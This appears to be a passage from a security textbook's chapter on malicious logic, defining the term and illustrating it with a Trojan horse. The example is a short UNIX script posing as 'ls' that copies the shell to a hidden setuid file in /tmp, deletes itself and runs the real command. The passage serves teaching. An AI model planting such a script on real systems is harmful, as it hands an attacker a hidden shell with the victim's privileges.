|
|
|
Odysseus, of Trojan War fame, found the most effective way to breach a hitherto-impregnable fortress was to have people inside bring him in without knowing they were doing so [482, 1016]. The same approach works for computer systems.
Definition 22–1. Malicious logic is a set of instructions that cause a site's security policy to be violated.
|
EXAMPLE: The following UNIX script is named ls and is placed in a directory. cp /bin/sh /tmp/.xxsh chmod o+s,w+x /tmp/.xxsh rm ./ls ls $* It creates a copy of the UNIX shell that is setuid to the user executing this program (see Section 14.3). This program is deleted, and then the correct ls command is executed. On most systems, it is against policy to trick someone into creating a shell that is setuid to themselves. If someone is tricked into executing this script, a violation of the (implicit) security policy occurs. This script is an example of malicious logic. |
|
|
|
| Top |